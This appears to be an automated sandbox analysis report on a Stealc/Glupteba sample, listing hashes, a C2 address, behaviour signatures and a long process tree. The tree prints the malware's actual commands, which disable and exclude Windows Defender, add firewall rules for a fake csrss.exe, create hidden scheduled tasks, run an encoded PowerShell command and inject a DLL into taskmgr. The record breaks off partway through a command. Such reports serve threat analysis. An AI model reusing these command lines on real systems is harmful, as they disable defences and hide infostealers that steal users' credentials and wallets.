Analysis

  • max time kernel
    83s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-01-2024 16:42

General

  • Target

    file.exe

  • Size

    5.0MB

  • MD5

    2b2eab865b6f06cba30a1c8d51ba2232

  • SHA1

    592e2f8e1d6d72e66e8b164b5039f966e105f6dd

  • SHA256

    15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5

  • SHA512

    3090d14ebade60f15b30f87d62c16352079a87658c77519c385de7bb3fa3f52ade688345a0c09e5501f4e3828752db53fcb51fdb948bf28fc130990a75ee3dcc

  • SSDEEP

    49152:X57qFK3V68ujeUKdHLgRJkkHnrkHhmvuFuvsqH77z1skzWQrzBwtmar58cJMfX92:Qfw0b1ByQr4SxP0

Malware Config

Extracted

Family

stealc

C2

http://185.172.128.79

Attributes
  • url_path

    /3886d2276f6914c4.php

rc4.plain

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 11 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • UAC bypass 3 TTPs 1 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 1 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 12 IoCs
  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 10 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Registers COM server for autorun 1 TTPs 11 IoCs
  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • NSIS installer 6 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 14 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 22 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • UAC bypass
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:4364
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:552
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
      2⤵
      • Drops startup file
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4660
      • C:\Users\Admin\Pictures\j4VG6YQFodZb0hkRBTESGOpR.exe
        "C:\Users\Admin\Pictures\j4VG6YQFodZb0hkRBTESGOpR.exe"
        3⤵
        • Executes dropped EXE
        PID:3876
      • C:\Users\Admin\Pictures\G5XqwduezCzjPSA2vgsvtyVN.exe
        "C:\Users\Admin\Pictures\G5XqwduezCzjPSA2vgsvtyVN.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1636
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2864
        • C:\Users\Admin\Pictures\G5XqwduezCzjPSA2vgsvtyVN.exe
          "C:\Users\Admin\Pictures\G5XqwduezCzjPSA2vgsvtyVN.exe"
          4⤵
          • Executes dropped EXE
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:4320
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            5⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5064
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            5⤵
              PID:1964
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                PID:3768
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              5⤵
                PID:4468
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                  PID:4124
                  • C:\Windows\System32\Conhost.exe
                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    6⤵
                      PID:1980
                  • C:\Windows\rss\csrss.exe
                    C:\Windows\rss\csrss.exe
                    5⤵
                      PID:640
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        6⤵
                          PID:2696
                        • C:\Windows\SYSTEM32\schtasks.exe
                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                          6⤵
                          • Creates scheduled task(s)
                          PID:3840
                        • C:\Windows\SYSTEM32\schtasks.exe
                          schtasks /delete /tn ScheduledUpdate /f
                          6⤵
                            PID:5060
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            6⤵
                              PID:2040
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              6⤵
                                PID:5036
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  7⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2424
                              • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                6⤵
                                  PID:2124
                                • C:\Windows\SYSTEM32\schtasks.exe
                                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                  6⤵
                                  • Creates scheduled task(s)
                                  PID:3764
                                • C:\Windows\windefender.exe
                                  "C:\Windows\windefender.exe"
                                  6⤵
                                    PID:3236
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                      7⤵
                                        PID:3544
                                        • C:\Windows\SysWOW64\sc.exe
                                          sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                          8⤵
                                          • Launches sc.exe
                                          PID:2200
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4320 -s 888
                                    5⤵
                                    • Program crash
                                    PID:944
                              • C:\Users\Admin\Pictures\JHt22axQJvE7SfvPh5TzGy7B.exe
                                "C:\Users\Admin\Pictures\JHt22axQJvE7SfvPh5TzGy7B.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:1628
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3292
                                • C:\Users\Admin\Pictures\JHt22axQJvE7SfvPh5TzGy7B.exe
                                  "C:\Users\Admin\Pictures\JHt22axQJvE7SfvPh5TzGy7B.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Checks for VirtualBox DLLs, possible anti-VM trick
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1676
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -nologo -noprofile
                                    5⤵
                                    • Drops file in System32 directory
                                    • Modifies data under HKEY_USERS
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5020
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                    5⤵
                                      PID:3004
                                      • C:\Windows\system32\netsh.exe
                                        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                        6⤵
                                        • Modifies Windows Firewall
                                        PID:1808
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      5⤵
                                        PID:5036
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        5⤵
                                          PID:4760
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 672
                                          5⤵
                                          • Program crash
                                          PID:1140
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 644
                                        4⤵
                                        • Program crash
                                        PID:3532
                                    • C:\Users\Admin\Pictures\hKeNZEG0rMfnz0wGX5757KhI.exe
                                      "C:\Users\Admin\Pictures\hKeNZEG0rMfnz0wGX5757KhI.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of WriteProcessMemory
                                      PID:704
                                      • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                                        C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                                        4⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        • Suspicious use of WriteProcessMemory
                                        PID:808
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                                          5⤵
                                            PID:2424
                                            • C:\Windows\SysWOW64\chcp.com
                                              chcp 1251
                                              6⤵
                                                PID:1736
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                                                6⤵
                                                • Creates scheduled task(s)
                                                PID:1548
                                          • C:\Users\Admin\AppData\Local\Temp\nsa51E6.tmp
                                            C:\Users\Admin\AppData\Local\Temp\nsa51E6.tmp
                                            4⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks processor information in registry
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2484
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsa51E6.tmp" & del "C:\ProgramData\*.dll"" & exit
                                              5⤵
                                                PID:640
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 5
                                                  6⤵
                                                  • Delays execution with timeout.exe
                                                  PID:5068
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 3332
                                                5⤵
                                                • Program crash
                                                PID:2752
                                          • C:\Users\Admin\Pictures\A1UTnHalTLsCQFuXmO9N2dG4.exe
                                            "C:\Users\Admin\Pictures\A1UTnHalTLsCQFuXmO9N2dG4.exe" --silent --allusers=0
                                            3⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Enumerates connected drives
                                            • Modifies system certificate store
                                            • Suspicious use of WriteProcessMemory
                                            PID:1540
                                            • C:\Users\Admin\Pictures\A1UTnHalTLsCQFuXmO9N2dG4.exe
                                              C:\Users\Admin\Pictures\A1UTnHalTLsCQFuXmO9N2dG4.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2e0,0x2e4,0x2e8,0x2bc,0x2ec,0x6ec39530,0x6ec3953c,0x6ec39548
                                              4⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:2356
                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\A1UTnHalTLsCQFuXmO9N2dG4.exe
                                              "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\A1UTnHalTLsCQFuXmO9N2dG4.exe" --version
                                              4⤵
                                                PID:4776
                                              • C:\Users\Admin\Pictures\A1UTnHalTLsCQFuXmO9N2dG4.exe
                                                "C:\Users\Admin\Pictures\A1UTnHalTLsCQFuXmO9N2dG4.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1540 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240116164257" --session-guid=a7e5556b-c3b0-4ef7-a885-9692ac506443 --server-tracking-blob=OGFiZDNhYzkxOGQ0M2ZhNmQ2NDI1N2QyZTI5YWMyNzVmMDcyNzRkZmM4MDM2OTVjNTBlZmZkN2UyOTcyMWZmMTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNTQyMzM1OS45Njk2IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIzYjcxMzY5Yi1iMWMwLTQ0OGEtYjE3NC02MjdmODk1MzZjOWUifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0005000000000000
                                                4⤵
                                                • Executes dropped EXE
                                                PID:3080
                                                • C:\Users\Admin\Pictures\A1UTnHalTLsCQFuXmO9N2dG4.exe
                                                  C:\Users\Admin\Pictures\A1UTnHalTLsCQFuXmO9N2dG4.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2ec,0x2f0,0x2f4,0x24c,0x2f8,0x6e159530,0x6e15953c,0x6e159548
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:2996
                                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161642571\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
                                                "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161642571\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:4776
                                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161642571\assistant\assistant_installer.exe
                                                "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161642571\assistant\assistant_installer.exe" --version
                                                4⤵
                                                  PID:952
                                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161642571\assistant\assistant_installer.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161642571\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x892614,0x892620,0x89262c
                                                    5⤵
                                                      PID:4100
                                                • C:\Users\Admin\Pictures\feRMVT6cQzSjIpX0mvD6CW7I.exe
                                                  "C:\Users\Admin\Pictures\feRMVT6cQzSjIpX0mvD6CW7I.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:4984
                                                • C:\Users\Admin\Pictures\kmdtPOoiubBI95hE2VI3uNYU.exe
                                                  "C:\Users\Admin\Pictures\kmdtPOoiubBI95hE2VI3uNYU.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1652
                                                  • C:\Users\Admin\AppData\Local\Temp\7zSA17B.tmp\Install.exe
                                                    .\Install.exe
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:5112
                                                    • C:\Users\Admin\AppData\Local\Temp\7zSAD71.tmp\Install.exe
                                                      .\Install.exe /gdidwDXwn "385118" /S
                                                      5⤵
                                                      • Checks BIOS information in registry
                                                      • Checks computer location settings
                                                      • Executes dropped EXE
                                                      • Drops file in System32 directory
                                                      • Enumerates system info in registry
                                                      PID:3376
                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                        6⤵
                                                          PID:1808
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                            7⤵
                                                              PID:4832
                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                8⤵
                                                                  PID:1980
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                  8⤵
                                                                    PID:5068
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                6⤵
                                                                  PID:1096
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                    7⤵
                                                                      PID:1556
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                        8⤵
                                                                          PID:2968
                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                          8⤵
                                                                            PID:2856
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "ggfJCGOjW" /SC once /ST 03:49:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                        6⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:4516
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /run /I /tn "ggfJCGOjW"
                                                                        6⤵
                                                                          PID:3736
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /DELETE /F /TN "ggfJCGOjW"
                                                                          6⤵
                                                                            PID:4860
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /CREATE /TN "bgKZxxDIOpRGITjYTe" /SC once /ST 16:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\gqkfKEz.exe\" Ik /NYsite_idFHN 385118 /S" /V1 /F
                                                                            6⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:4500
                                                                    • C:\Users\Admin\Pictures\czZ5AxN354Reg0eSdEBdUJ5c.exe
                                                                      "C:\Users\Admin\Pictures\czZ5AxN354Reg0eSdEBdUJ5c.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Registers COM server for autorun
                                                                      • Drops file in Program Files directory
                                                                      • Modifies registry class
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:4552
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1628 -ip 1628
                                                                  1⤵
                                                                    PID:1736
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                    1⤵
                                                                      PID:4728
                                                                      • C:\Windows\system32\gpupdate.exe
                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                        2⤵
                                                                          PID:3480
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2484 -ip 2484
                                                                        1⤵
                                                                          PID:2328
                                                                        • C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\gqkfKEz.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\gqkfKEz.exe Ik /NYsite_idFHN 385118 /S
                                                                          1⤵
                                                                            PID:5028
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 